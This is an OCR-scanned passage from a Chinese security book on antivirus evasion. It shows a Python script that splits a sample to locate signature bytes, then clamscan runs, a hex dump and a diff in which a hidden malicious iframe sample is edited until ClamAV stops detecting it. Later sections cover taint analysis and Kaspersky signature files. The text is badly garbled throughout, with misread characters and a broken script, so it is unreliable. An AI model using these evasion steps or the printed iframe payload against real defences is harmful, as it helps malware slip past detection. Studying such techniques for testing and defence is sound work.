被 成 功 绕 过 ， 除 了 一 款 基于 Word 97 的 宏 病 毒 ， 这 是 因为 参赛 者 手头 没有 这 款 软件 。 不 出 所 料 ， 
反 病 毒 软 件 厂 商 听 闻 此 消息 十 分 震怒 ， 纷 纷 抱怨 这 项 赛事 带 了 一 个 坏 头 。AVG 科 技 的 研究 总 监 
(CRO ) Roger Thompson 一 语 道破 一 些 反 病毒 软件 厂商 的 心声 ， 认 为 这 项 赛事 是 在 写 出 “更 多 的 
病毒 ”。 趋 势 科 技 的 Paul Ferguson 认 为 ， 鼓励 黑客 参加 一 项 以 绕 过 反 病 毒 软件 为 主题 的 竞赛 是 不 
智之 举 ， 并 说 这 “有 点 过 头 了 ”。 不 出 所 料 ， 大 多 数 反 病 毒 软件 行业 的 人 都 对 此 表示 不 满 。 不 过 
不 管 反 病毒 三 商 如 何 抱怨 ， 赛 事 的 结果 表明 ， 绕 过 反 病 毒 软 件 的 侦 测 并 不 是 一 件 难 事 。 事 实 上 ， 
由 于 这 类 竞赛 太 过 容易 ， 之 后 DefCon 再 也 没有 举办 过 类 似 比 赛 。 


6.2 ”探究 反 病 毒 软件 侦 测 恶意 软件 的 方式 


人 研究 绕 过 反 病毒 软件 的 核心 是 明日 恶意 软件 是 如 何 被 侦 测 的 。 样 本 是 被 基于 特征 码 的 静态 检 
测 技术 检测 到 的 , 是 被 基于 针对 可 疑 行 为 的 动态 监测 技术 检测 到 的 , 还 是 被 防止 未 知 软件 执行 的 
文件 可 信 系统 检测 到 的 ?如 果 样 本 是 被 特征 码 检 测 到 的 , 相关 特征 码 技术 又 是 在 哪些 地 方 获 取 特 
征 的 ?是 基于 PE 文件 导入 的 函数 进行 检测 的 , 是 基于 样本 中 的 代码 或 数据 块 的 箭 进行 检测 的 , 还 
是 匹配 样本 中 部 分 区 块 或 铭 入 样本 中 文件 的 某 些 特定 字符 串 ? 接 下 来 将 介绍 一 些 用 来 探究 恶意 
软件 是 如 何 被 侦 测 到 的 历久 弥 新 的 技术 。 


6.2.1 用 于 侦 测 恶意 软件 的 老 把 戏 : 分 治 算法 


绕 过 基于 静态 特征 码 ( 如 CRC 或 简单 模式 匹配 算法 ) 的 反 病毒 扫描 顺 的 最 古老 技 巧 是 : 把 文 
件 分 成 细小 的 若干 部 分 ,然后 对 这 些 部 分 逐一 分 析 。 将 样本 文件 分 成 若干 部 分 以 后 ， 其 中 仍然 会 
触发 反 病 毒 扫描 器 的 检测 告警 的 部 分 ,就 是 接 下 来 为 了 绕 过 反 病 毒 软件 需要 修改 的 部 分 。 虽 然 这 
听 起 来 十 分 幼稚 ,而且 大 多 数 情况 下 可 能 都 不 管用 , 但 是 如 果 反 病毒 软件 使 用 的 是 基于 校 验 和 的 
特征 码 算法 或 是 简单 特征 匹配 检测 算法 ， 就 会 十 分 有 用 了 。 但 在 研究 和 测试 过 程 中 , 根据 样本 文 
件 格 式 的 不 同 ， 需 要 有 针对 性 地 作出 调整 。 比 如 ， 如 果 要 让 一 个 PE 文件 绕 过 反 病 毒 软件 的 检测 ， 
将 PE 文件 分 成 若干 部 分 可 能 会 有 效 ， 因 为 反 病毒 引擎 肯定 会 首先 校 验 样本 文件 是 否 是 PE 文件 。 
当 PE 文 件 分 为 不 同 的 数据 块 后 ， 可 能 会 丢失 有 效 的 PE 文件 头 ; 因此 ， 反 病毒 软件 就 不 会 再 查 杀 
样本 文件 了 。 在 这 里 可 以 使 用 类 似 的 方法 ， 但 与 前 面 将 样本 文件 拆 分 为 不 同 数据 块 的 方式 不 同 ， 
这 里 我 们 将 文件 拆 分 成 大 小 递增 的 小 部 分 : 第 一 个 文件 包含 偏 移 量 为 0~256 字 广 的 字 节 码 区 块 ， 
接 下 来 的 文件 包含 偏 移 量 为 0~512 字 节 的 字 节 码 区 块 ， 以 此 类 推 。 

如 果 新 创建 的 文件 被 反 病毒 软件 侦 测 到 , 就 能 推测 出 样本 文件 是 在 哪 一 块 以 及 在 哪 处 偏 移 被 
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反 病 毒 软件 查 杀 到 的 。 打 个 比方 ， 如 果 样 本 文件 在 带 有 偏 移 量 为 2048 的 数据 块 时 被 查 杀 ， 这 时候 
可 以 继续 一 个 字 节 一 个 字 节 地 拆 分 文件 , 直到 最 终 找 出 匹配 特征 对 应 的 偏 移 量 ( 也 可 以 使 用 十 六 
进 制 编辑 器 打开 文件 ,查看 文件 中 是 否 有 特殊 的 区 域 ， 比 如 特定 的 字 节 排列 ， 然 后 手动 进行 相关 
修改 )。 按照 上 述 步 又 进行 测试 后 ,你 就 能 知道 样本 中 的 哪个 偏 移 量 触发 了 扫描 器 的 告警 。 同 时 ， 
你 需要 去 猜测 样本 在 缓冲 区 中 是 如 何 被 反 病 毒 软件 识别 出 来 的 。 在 90% 的 情况 下 ,原因 很 简单 ， 
扫描 器 使 用 的 是 基于 模糊 散 列 C 即 CRC ) 算法 或 模式 匹配 技术 ,抑或 是 两 者 结合 的 特征 码 查 杀 技 
术 。 在 一 些 情况 下 , 反 病 毒 软件 通过 加 密 散 列 ( 针对 整个 文件 或 者 某 一 数据 块 ) 来 查 杀 侦 测 样本 ， 
很 有 可 能 是 通过 校 验 MD5 值 。 在 这 种 情况 下 , 你 自然 而 然 地 需要 更 改 文件 内 容 的 一 部 分 或 者 特定 
数据 块 ， 同时 由 于 用 于 识别 文件 的 加 密 散 列 的 单一 性 , 文件 的 散 列 值 会 因为 改动 而 变更 , 最 终 导 
致 反 病 毒 软件 无 法 查 杀 更 改过 的 样本 文件 ， 从 而 绕 过 了 反 病 毒 软件 。 

使 用 分 治 算法 绕 过 基于 简单 特征 码 的 扫描 检测 

下 面 这 个 实验 所 使 用 样本 的 MD5 为 8834639bda8664aca00b5599aaab833ea， 原始 样本 可 
以 被 ClamAV 检 测 , 并 标记 为 Exploit.HTML.IFrame-6。 样 本 目前 已 经 没有 攻击 性 ,因为 样本 中 iframe 
标签 指向 的 恶意 URL 已 经 失效 。 如 果 使 用 clamscan 工 具 扫描 以 下 样本 ， 会 得 到 下 面 这 个 结果 : 


$ clamscan -i 8834639bdq8664aca00b5599aaab833ea 
8834639bd8664aca0055599aaab833ea: Exploit.HTML.IFrame-6 FOUND 
























































c pu ru C EE SCAN SUMMARY ----------- 
Known viruses: 3700704 

Engine version: 0.98.1 

Scanned directories: 0 

Scanned files: 1 

Infected files: 1 

Data scanned: 0.01 MB 

Data read: 0.01 MB (ratio 1.00:1) 
Time: 5.509 sec (0m 5 s) 


如 你 所 见 ， 样 本 可 以 成 功 被 ClamAV 查 杀 。 现 在 ， 让 我 们 尝试 使 用 前 面 讨论 到 的 技术 ， 绕 过 
ClamAV 的 反 病毒 扫描 。 为 了 实现 这 个 目的 ,需要 使 用 一 个 Python 脚 本 将 文件 拆 分 成 递增 的 若干 
部 分 : 每 次 以 256 字 节 递 增 地 从 文件 中 提取 代码 部 分 。 脚 本 代码 如 下 : 


#!/usr/bin/python 








import os 
import sys 
import time 


# S up mx UI Dmm 
def log(msg): 

print("[$s] $s" $ (time.asctime(), msg)) 
# m RE a FE PAE ———— -——————————— a SA ENE a A A AE E A E Á——— e 


class CSplitter: 
def | init (self, filename): 
self.buf = open(filename, "rb").read() 
self.block size - 256 
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def split(self, directory): 
blocks - len(self.buf) / self.block size 
for i in xrange(1, blocks): 
buf = self.buf[:i*self.block size] 
path = os.path.join(directory, "block $d" $ i) 


log("Writing file $s for block $d (until offset Ox$x)" % \ 
(path, i, self.block size * i)) 

- open(path, "wb") 

.write (buf) 


def main(in path, out path): 
splitter - CSplitter(in path) 
splitter.split(out path) 





def usage(): 
print("Usage: ", sys.argv[0], "«in file» «directory»") 


itf name me "fain < "s 
if len(sys.argv) !- 3: 
usage() 
else: 
main(sys.argv[1], sys.argv[2]) 





执行 python split.py file directory, 按照 上 述 思路 生成 若干 稍 小 的 文件 ， 直 到 递增 


到 原始 样本 文件 最 终 的 偏 移 量 处 : 


$ python split.py 8834639bd8664aca00b5599aaab833ea blocks/ 

hu Dec 4 03:46:31 2014] Writing file blocks/block 1 for block 1 
(until offset 0x100) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 2 for block 2 
(until offset 0x200) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 3 for block 3 
(until offset 0x300) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 4 for block 4 
(until offset 0x400) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 5 for block 5 
(until offset 0x500) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 6 for block 6 
(until offset 0x600) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 7 for block 7 
(until offset 0x700) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 8 for block 8 
(until offset 0x800) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 9 for block 9 
(until offset 0x900) 
Thu Dec 4 03:46:31 2014] Writing file blocks/block 10 for block 10 
(until offset 0xa00) 

(more lines skipped...) 


d 
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脚本 生成 文件 完毕 后 ， 青 启动 clamscan 反 病毒 扫描 工具 ， 对 新 生成 的 样本 文件 所 在 的 目录 





























寺 征 码 从 第 二 区 块 开 始 匹 配 。 匹 配 的 文件 大 小 在 512 字 市 内 。 如 果 














Li. 


L1. 


Li. 


Li. 


HHHHHHHHHH 


RE 
I 








Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 
.-IFrame-6 FOUND 
Frame-6 FOUND 
Frame-6 FOUND 








Tas] NUI EX.) blocks/block 2 文件 ， 将 看 到 下 列 结果 : 


进行 扫描 : 
$ clamscan -i blocks/block * 
blocks/block 10: Exploit.HTM 
blocks/block 11: Exploit.HTM 
blocks/block 12: Exploit.HTM 
blocks/block 13: Exploit.HTM 
blocks/block 14: Exploit.HTM 
blocks/block 15: Exploit.HTM 
blocks/block 16: Exploit.HTM 
blocks/block 17: Exploit.HTM 
blocks/block 18: Exploit.HTM 
blocks/block 19: Exploit.HTM 
blocks/block 2: Exploit.HTML 
blocks/block 20: Exploit.HTM 
blocks/block 21: Exploit.HTM 
[eed 
扫描 结果 显示 ， 

六 进 制 编 
$ pyew blocks/block 2 
0000 3C 68 74 6D 6C 3E 3C 68 
0010 61 20 68 74 74 70 2D 65 
0020 6E 74 65 6E 74 2D 54 79 
0030 65 6E 74 3D 22 74 65 78 
0040 63 68 61 72 73 65 74 3D 
0050 31 32 35 31 22 3E 3C 74 
0060 EE EF FO E5 F1 F1 20 2D 
0070 E5 EB EE E2 EE E9 20 EF 
0080 69 74 6C 65 3E 3C 2F 68 
0090 64 79 20 62 67 63 6F 6C 
00A0 32 44 32 22 20 41 4C 49 
00BO0 30 30 30 22 20 56 4C 49 
00C0 32 38 44 22 20 4C 49 4E 
00DO 33 34 22 20 4C 45 46 54 
00E0 30 22 20 52 49 47 48 54 
00F0 30 22 20 54 4F 50 4D 41 
0100 3E 3C 69 66 72 61 6D 65 
0110 74 70 3A 2F 2F 69 6E 74 
0120 65 73 74 6F 72 65 2E 63 
0130 3F 69 6E 63 6F 6D 65 32 
0140 3D 31 20 68 65 69 67 68 
0150 65 3D 22 76 69 73 69 62 
0160 69 64 64 65 6E 22 3E 3C 
0170 0A 3C 54 41 42 4C 45 20 
0180 45 AE 54 45 52 22 20 56 
0190 4F 50 22 20 42 4F 52 44 
01A0 49 44 54 48 3D 22 37 37 
01B0 61 64 64 69 6E 67 3D 22 
01C0 70 61 63 69 6E 67 3D 22 
01D0 6F 72 3D 22 23 44 46 44 


65 
71 
70 
74 
EN 
69 
20 
FO 
65 
6F 
4E 
4E 
4B 
4D 
4D 
52 
20 
65 
6E 
36 
74 
69 
2F 
41 
41 
45 
34 
30 
30 
44 


61 64 3E 
75 69 76 
65 22 20 
2F 68 74 
69 6E 64 
74 6C 65 
D6 E5 ED 
E5. Fl FL 
61 64 3E 
72 3D 22 
4B 3D 22 
4B 3D 22 
3D 22 23 
41 52 47 
41 52 47 
47 49 4E 
43 2:363 
72 6E 65 
2F 69 6E 
22 20 77 
3D 31 20 
6C 69 74 
69 66 72 
4C 49 47 
4C 49 47 
52 3D 22 
22 20 63 
22 20 63 
22 20 62 
44 44 22 


36 6D 
3D 22 
63 6F 
6D 6C 
6F 77 
3E CO 
F2 F0 
FB 3C 
0A 3C 
23 44 
23 44 
23 39 
34 31 
49 4E 
49 4E 
3D 22 
3D 22 
74 6E 
2E 63 
69 64 
73 74 
79 3A 
61 6D 
4E 3D 
4E 3D 
30 22 
65 6C 
65 6C 
67 63 
3E 0A 


65 
43 
6E 
3B 
73 
FD 
20 
2F 
62 
37 
41 
38 
33 
3D 
3D 
30 
68 
61 
67 
74 
79 
20 
65 
22 
22 
20 
6c 
6c 
6F 
3c 


74 
6F 
74 
20 
2D 
FO 
EA 
74 
6F 
44 
30 
38 
41 
22 
22 
22 
74 
6D 
69 
68 
6c 
68 
3E 
43 
54 
57 
70 
73 
6c 
54 


«html»«head»«met 
a http-equiv-"Co 
ntent-Type" cont 
ent-"text/html; 

charset-windows- 
1251"»«title»... 


itle»«/head».«bo 
dy bgcolor="#D7D 
2D2" ALINK-"£4DAO 
000" VLINK-"£$4989 
28D" LINK-"4413A 
34" LEFTMARGIN-" 
0" RIGHTMARGIN-" 
0" TOPMARGIN-"O" 
2»«iframe src-"ht 
tp://internetnam 
estore.cn/in.cgi 
?income26" width 
=1 height-1 styl 
e-"visibility: h 
idden"»«/iframe» 
. <TABLE ALIGN-"C 
ENTER" VALIGN="T 
OP" BORDER="0" W 
IDTH-"774" cellp 
adding-"0" cells 
pacing-"0" bgcol 
or-z"4DFDDDD"-».«T 





你 使 用 十 
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01E0 52 3E 0A 3C 54 44 20 57 49 44 54 48 3D 22 32 22 R».«TD WIDTH-"2" 
01F0 20 72 6F 77 73 70 61 6E 3D 22 31 33 22 20 62 61 rowspan-"13" ba 


注意 从 原始 文件 中 取出 的 数据 块 中 的 <iframe> 标 签 。 我 们 可 以 据 此 得 出 一 个 合理 的 猜测 : 
反 病 毒 扫 描 需 的 特征 码 查 杀 过 程 ， 似 乎 是 通用 基于 itiame 的 特征 码 进行 的 ， 其 过 程 是 匹配 查找 
<iframe> 标 签 ， 且 可 能 是 一 些 标签 属性 。 那 要 如 何 修改 HTML 标 签 或 是 其 对 应 的 属性 ， 来 使 样 
本 绕 过 反 病 毒 软件 的 查 杀 呢 ? 首 先 试 着 将 <iframe src="…" 修 改 为 <iframe src='…'。 虽 然 这 
看 起 来 很 简单 ， 只 是 将 双 引 号 改 成 了 单 引 号 , 但 在 某 些 情况 下 是 有 效 的。 修改 完成 后 ,扫描 一 下 
试 试 : 

$ clamscan modified block 

modified block: Exploit.HTML.IFrame-6 FOUND 























cci iens SCAN SUMMARY ----------- 
Known viruses: 3700704 

Engine version: 0.98.1 

Scanned directories: 0 

Scanned files: 1 

Infected files: 1 

Data scanned: 0.00 MB 

Data read: 0.00 MB (ratio 0.00:1) 
Time: 5.581 sec (0m 5 s) 


似乎 并 没有 什么 效果 。 接 下 来 , 换 另 一 个 方式 试 试 ,删除 这 ame 标 签 的 style="visipility: 
hidden" 属 性 。 通 过 比 对 ， 可 以 发 现 这 也 是 一 个 十 分 简单 的 改动 : 


$ diff modified block blocks/block 2 
2c2 

< «body bgcolor-"$D7D2D2" ALINK-"4DA0000" VLINK-"498928D" LINK-"4413A34" 
LEFTMARGIN-"O0" RIGHTMARGIN-"O" TOPMARGIN-"0"»«iframe 
src-'http://internetnamestore.cn/in.cgi?income26" width-1 height-1 
style-"visibility:hidden"--/iframe- 





> «body bgcolor-"4D7D2D2" ALINK-"£4DA0000" VLINK-"$498928D" LINK="#413A34" 
LEFTMARGIN-"O0" RIGHTMARGIN-"O0" TOPMARGIN-"O0"»«iframe 
src-"http://internetnamestore.cn/in.cgi?income26" width-1 height-1 
style-"visibility: hidden"'--/iframe- 


虽然 改动 十 分 简单 ， 但 是 当 我 们 再 次 运行 clamscan 命 令 行 扫描 器 进行 扫描 的 时 候 ， 会 发 现 
如 下 结 


$ clamscan modified block 
modified block: OK 





----------- SCAN SUMMARY ----------- 
Known viruses: 3700704 

Engine version: 0.98.1 

Scanned directories: 0 

Scanned files: 1 

Infected files: 0 

Data scanned: 0.00 MB 

Data read: 0.00 MB (ratio 0.00:1) 





Time: 5.516 sec (0m 5 s) 


扫描 带 已 经 无 法 识别 检测 刚刚 修改 过 的 样本 文件 了 。 现在， 只 需要 根据 上 面 的 发 现 , 修改 原 


样本 文件 ， 删除 文件 中 的 空格 ， 





过 ClamAV 针 对 iframe 类 恶意 软件 样本 的 通用 个 测 策略 )。 


就 可 以 绕 过 扫描 右 的 侦 测 了 (很 显然 , 我 们 同时 发 现 了 通用 的 绕 


提示 其实， 上 述 实 验 步 骤 对 查找 绕 过 ClamAV 的 方式 来 说 并 没有 必要 。 这 是 因为 ClamAV 是 一 
款 开 源 的 工具 ， 你 完全 可 以 使 用 sigtool 解 开 特征 码 文件 ， 找 到 其 侦 测 特征 以 及 针对 某 
一 类 型 恶意 软件 的 特征 码 类 别 。 以 先前 的 例子 为 例 ， 解 开 特征 码 文件 后 ， 应 该 可 以 找到 
对 应 visibility: hidden 的 十 六 进 制 查 杀 特征 。 如 果 找 到 了 纯 文本 类 型 的 特征 码 ， 要 
绕 过 反 病 毒 软件 就 会 更 容易 一 些 : 根据 反 病 毒打 描 器 查 杀 恶意 软件 的 特征 ， 对 样本 文件 
进行 一 些 修 改 ， 这样 扫描 器 就 无 法 识别 侦 测 样本 文件 了 。 可 以 说 这 正 是 开源 的 反 病 毒 软 
件 不 如 付费 版 的 反 病 毒 软件 有 效 的 原因 。 但 是 ,不管 是 开源 还 是 付费 版 的 反 病 毒 软件 ， 
都 会 使 用 到 特征 码 侦 测 技术 。 唯 一 不 同 是 ， 反 病毒 软件 厂商 不 会 提供 其 特征 码 库 的 解析 
程序 ， 这 类 解析 程序 可 能 由 研究 反 病 毒 软件 的 团队 或 个 人 编写 。 但 只 要 有 对 应 的 反 病 毒 
软件 的 特征 码 库 解析 程序 ， 绕 过 特征 码 检测 也 会 变 得 轻而易举 了 。 





6.2.2 ”二 进 制 指令 和 污点 分 析 


二 进 制 指令 分 析 是 在 指令 层面 监控 某 一 程序 的 行为 。 污 点 分 析 是 当 数据 被 treadq 或 recv 等 函 
数 读 取 后 ， 去 跟踪 探究 数据 流 ， 并 判断 传 入 的 数据 是 如 何 影 响 代码 流程 的 。 污点 分 析 程 序 是 程序 
分 析 中 备 受 欢迎 的 一 种 方法 , 可 以 使 用 不 同 的 二 进 制 指令 工具 集 来 编写 ,一些 二 进 制 指令 工具 包 
Hn] Intel PIN 和 开源 的 DynamoRIO， 并 且 可 以 用 于 调试 测试 程序 ， 比 如 反 
病毒 软件 的 命令 行 扫描 器 ,你 可 能 想 针对 你 得 心 应 手 的 二 进 制 指令 工 具 集 采用 更 为 复杂 的 污点 分 








可 以 免费 下 载 ， 比 妇 


析 模 块 ， 自 动 而 优 




































































以 及 最 终 样本 是 如 何 被 侦 测 到 的 。 但 是 建议 你 最 好 不 要 这 么 做 。 
下 面 是 不 推荐 使 用 上 述 方式 的 儿 个 重要 原因 。 

a 根据 不 同 的 反 病毒 引擎 ， 以 及 反 病 毒 软件 使 用 的 引 警 数量 ， 待 扫描 的 文件 可 能 会 被 打开 

一 次 到 多 次 。 不 同 的 反 病毒 软件 的 表现 不 尽 相 同 。 一 些 反 病 毒 软件 为 了 分 析 文 件 会 将 文 

件 打开 数 千 次 。 























E 地 追踪 传 入 值 的 来 源 ( 恶意 软件 样本 的 字 节 )， 并 了 解数 据 是 如 何 传递 的 ， 


a 即使 文件 打开 后 只 被 读 取 一 次 ， 它 的 所 有 字 节 都 会 通过 某 种 方式 被 触 碰 到 ( 被 污染 )， 
此 你 可 能 会 收 到 大 量 的 跟踪 记录 (KAA E TJES T )。 
口 一 些 反 病 毒 引 擎 会 使 用 所 有 特征 码 对 所 有 文件 和 缓冲 区 进行 一 次 扫描 ， 即 使 已 经 侦 测 并 

判断 某 一 文件 是 亚 意 软件 了 。 比 如 ， 假 设 反 病毒 软件 有 100 个 侦 测 特征 ， 并 使 用 它们 扫描 
样本 文件 。 当 第 五 条 特征 检测 到 样本 文件 后 ， 反 病毒 引擎 会 继续 使 用 剩余 的 95 条 特 生 





F 进 


行 扫 描 。 这 使 得 我 们 很 难 判断 样本 文件 到 底 是 被 哪 条 特征 扫描 到 的 。 当 然 ， 如 果 针 对 不 
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同 的 反 病 毒 引 擎 和 扫 摘 程序 编写 污染 分 析 程 序 ， 就 能 发 现 反 病毒 引擎 中 不 同 的 代码 路 径 。 
反 病 毒 引 擎 读 取 到 的 缓冲 区 内 容 会 通过 不 同 的 方式 (IPC、Unix 网 络 套 接 字 等 ) 被 发 送 
到 其 他 队列 去 处 理 ， 由 于 客户 端 部 分 没有 相关 检测 逻辑 ， 我 们 或 许 只 能 从 反 病 毒 软件 的 
服务 器 获取 到 样本 文件 是 否 是 病毒 的 信息 。 在 之 前 的 例子 中 ， 你 可 能 需要 在 反 病毒 软件 
的 客户 端 和 服务 器 端 运行 你 的 二 进 制 命令 和 污点 分 析 工 具 。 这 是 因为 在 一 些 反 病毒 产品 
中 ， 不 同 的 队列 中 有 不 同 的 特征 码 程序 ( 比如 ， 客 户 端的 特征 码 较 少 ， 服 务 器 端的 特征 
码 较 多 )。 
为 了 和 弄 明白 污点 分 析 引 擎 记录 下 的 污点 数据 ， 你 需要 修改 引擎 来 覆盖 不 同方 式 的 扫描 方 
式 、 文 件 IO 操作 ， 网 络 套 接 字 API 调 用 以 及 缓冲 区 内 容 在 反 病 毒 内 核 中 的 传递 方式 。 污 
点 分 析 引 警 必须 针对 新 的 反 病 毒 引 擎 作出 调整 ， 这 就 意味 着 你 需要 针对 特定 的 反 病 毒 引 
擎 编写 丑陋 的 、 硬 编码 的 污点 分 析 引 擎 代码 。 这 一 过 程 十 分 消耗 时 间 ， 尤 其 是 考虑 到 市 
场 上 有 大 量 的 反 病毒 产品 时 。 比 如 ，VirusTotal 多 引擎 扫描 网 站 上 有 40 款 反 病 毒 产品 ， 而 
且 每 款 产 品 的 工作 方式 各 不 相同 。 
口 编写 这 样 一 套 二 进 制 指令 和 污点 分 析 系 统 并 不 划算 ， 即 使 是 在 理想 情况 下 ， 大 部 分 的 特 
殊 案 例 都 能 被 攻破 ， 大 部 分 的 难题 都 能 被 解决 。 如 今 ， 绕 过 静态 特征 码 检 测 十 分 容易 。 
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6.3 总 结 


祭 恶 意 软件 作者 外 , 受 鹿 于 茶 些 公 司 、 针 对 公司 防 架构 开展 测试 并 需要 绕 过 已 部 署 的 反 病 毒 
产品 的 渗透 测试 员 ， 也 需要 研究 使 用 反 病 毒 软件 绕 过 技术 。 绕 过 反 病 毒 软件 的 技术 分 为 两 类 : 静 
口 静态 绕 过 技术 主要 通过 修改 样本 文件 中 的 某 些 内 容 ， 改 变 其 校 验 和 或 散 列 值 ， 以 躲避 反 
病毒 软件 基于 特征 码 的 查 杀 。 

口 无 论 是 在 真实 环境 还 是 模拟 环境 下 ， 晋 意 软件 都 会 用 到 动态 绕 过 技术 。 亚 意 软 件 可 以 识 
别 反 病 毒 软件 ， 并 根据 不 同情 况 躲 避 检 测 。 
本 章 最 后 介绍 了 两 种 方法 ， 来 帮助 大 家 理解 反 病毒 软件 是 如 何 绕 过 反 病 毒 软件 的 检测 的 。 
口 分 治 算法 可 以 将 恶意 文件 样本 分 为 多 块 ， 然 后 将 拆 分 的 每 一 块 都 发 送 给 反 病毒 软件 检测 ， 
并 探究 出 到 底 是 哪 一 块 触发 了 反 病毒 软件 的 检测 。 一 旦 发 现 了 某 一 块 数据 是 反 病 毒 软件 
检测 的 特征 ， 修 改 相关 数据 使 其 不 能 被 反 病毒 软件 检测 就 变 得 相对 容易 了 。 

口 借助 类 似 Intel PIN 或 DynamoRIO 的 库 进 行 二 进 制 指令 和 污点 分 析 , 可 以 追溯 反 病毒 软件 的 

执行 过 程 。 比 如 ， 当 针对 特定 的 反 病 毒 软件 部 分 进行 调试 分 析 后 ， 就 可 以 明白 传人 的 样 
本 文件 是 如 何 被 侦 测 到 的 。 但 是 ， 大 量 的 执行 追溯 和 动态 二 进 制 指令 分 析 日 志 使 得 这 一 
过 程 十 分 繁琐 、 耗 时 。 

本 章 为 后 续 章 节 的 相关 内 容 作 了 铺垫 下 一 章 将 会 阐释 如 何 绕 过 针对 各 类 文件 格式 的 基于 特 

征 码 的 反 病 毒 检测 。 
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无 论 对 于 “坏人 ”( 如 恶意 软件 编写 者 ) 还 是 对 于 “好 人 ”( 如 渗透 测试 者 ) 来 说 ， 绕 过 反 病 
毒 软件 的 特征 码 都 是 最 常见 的 任务 之 一 。, 绕 过 反 病毒 特 征 码 技术 的 复杂 程度 取决 于 所 掌握 特征 码 
信息 的 数量 ， 要 绕 过 特征 码 技 术 的 文件 格式 ， 以 及 想 要 绕 过 的 反 病 毒 软件 数量 。 

如 前 所 述 ， 不 少 反 病毒 软件 常用 基于 CRC32 校 验 实 现 特征 码 病毒 侦 测 。 例 如 ， 第 6 章 提 到 的 
绕 过 ClamAV 名 为 Exploit.HTML.IFrame-6 的 反 病毒 特征 码 的 过 程 ， 就 是 找到 反 病 毒 软件 校 验 和 匹 
配 的 偏 移 量 并 对 其 进行 细微 改动 。 但 是 , 也 有 一 部 分 特征 码 检测 技术 更 为 复杂 ,不 能 使 用 简单 的 
方法 绕 过 。 例如 , 像 那 些 主要 针对 PE 文件 的 文件 格式 感知 特征 码 , 在 其 侦 测 过 程 中 , 并 不 是 选取 
特定 偏 移 量 开始 的 固定 大 小 的 缓冲 区 。 此 类 文件 格式 感知 的 特征 码 技术 对 于 Microsoft Office 支 持 
的 文件 格式 同样 适用 ， 比 如 OLE2 容 器 和 RTF 文 件 以 及 其 他 各 类 文件 格式 (如 PDF 和 Flash 等 )。 本 
章 将 探讨 绕 过 针对 特定 文件 格式 的 特征 码 技术 的 多 种 方式 。 


7.1 文件 格式 : 偏 门 案例 和 无 文档 说 明 案 例 


反 病 毒 引 擎 要 支持 的 文件 格式 种 类 繁多 。 就 这 一 点 而 论 , 你 不 能 指望 像 文 件 格式 创建 者 那样 
透彻 地 理解 不 同 的 文件 格式 。 不同 反 病毒 厂商 针对 不 同文 件 格式 开发 的 解析 程序 , 无 论 是 在 当下 
还 是 在 未 来 ,其 运作 过 程 各 异 。 存 在 差异 的 原因 有 很 多 ， 比 如 文件 格式 的 复杂 性 ,针对 文件 格式 
的 说 明文 档 缺 失 或 质量 优 劣 。 比 如 ， 有 很 长 一 段 时 间 ，Microsoft Office 二 进 制 文件 格式 缺失 统一 
规范 ( 比如 Excel 或 Word 文 件 格 式 )。 在 那 段 时 间 里 ， 要 编写 针对 此 类 文件 格式 的 解析 器 ， 通 常 需 
要 逆向 分 析 并 查阅 其 他 个 人 或 团队 逆向 此 类 文件 格式 时 记录 下 来 的 相关 信息 〈 比 如 ，StarOffice 
为 了 兼容 Microsoft Office 类 文件 ， 对 Microsoft Office 的 相关 部 分 进行 了 逆向 分 析 )。 由 于 缺少 文件 
格式 的 规范 文档 ， 反 病毒 软件 针对 OLE2 容 需 文件 〈 即 Word 文 档 ) 的 解析 器 并 不 完善 ， 且 解析 器 
依赖 的 数据 或 逆向 分 析 结果 并 不 完全 准确 甚至 是 错误 的 。 

2008 年 ， 微 软 免费 公开 了 针对 二 进 制 Office 文 件 的 文档 ， 并 宣布 这 些 文档 没有 商业 秘密 权 。 
微软 公开 的 文档 集 包 含 27 份 PDF 文件 , 每 份 都 有 几 百 页 ， 总 计 201 MB。 按照 常理 来 说 ,目前 没有 
一 球 反 病毒 产品 可 以 完美 支持 该 类 文件 格式 。 比 如 ,如 果 反 病毒 厂商 希望 正确 支持 Microsoft XLS 
(Excel) 文件 格式 ， 工 程 师 需 要 阅读 完 1185 页 文档 。 这 对 反 病 毒 工程 师 来 说 是 一 项 不 小 的 挑战 。 
反 病 毒 软件 实现 针对 此 类 文件 格式 的 检测 解决 方案 过 程 十 分 复杂 且 耗 时 , 这 间接 给 病毒 作者 、 逆 
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向 分 析 者 和 渗透 测试 工程 师 绕 过 反 病 毒 扫 摘 器 开启 了 方便 之 门 。 


7.2” 绕 过 现实 中 的 特征 码 


本 节 将 以 卡巴 斯 基 2015 年 1 月 底 针 对 恶意 软件 Exploit.MSWord.CVE-20103333.cp 发 布 的 一 条 
通用 检测 特征 码 作 为 研究 对 象 ,该 条 检测 特征 用 于 检测 利用 旧版 本 Microsoft Word 处 理 RTF 格 式 文 
件 时 的 漏洞 攻击 程序 。 当 试图 绕 过 该 条 特征 码 时 ， 模 糊 测试 或 系统 地 进行 测试 研究 都 是 可 以 的 。 
不 过 ， 这 里 我 们 将 会 阐释 如 何 系统 地 开展 分 析 研 究 。 

为 了 正确 且 系 统 地 实现 我 们 的 目标 ， 首 先 需要 回答 以 下 几 个 重要 的 问题 。 

口 反 病 毒 软件 病毒 特征 库 的 文件 位 置 在 哪里 ? 
口 病毒 特征 库 的 文件 格式 是 什么 ? 
口 你 想 要 绕 过 的 侦 测 代 码 或 特征 码 在 哪个 文件 的 哪个 位 置 ? 

首先 从 最 简单 的 问题 和 人手 : 卡巴 斯 基 的 病毒 特征 库 文件 是 AVC 文 件 格式 。 当 安装 完 卡 巴 斯 基 
反 病 毒 软件 以 后 , 会 有 很 多 这 样 的 病毒 特征 库 文件 , 包括 base0001.avc , baseaSec.avc 、extXXX.avc、 
genXXX.avc、unpXXX.avc 等 。 本 例 中 需要 关注 的 是 dailyavc,， 每 日 更 新 程序 就 存储 在 这 里 面 。 如 
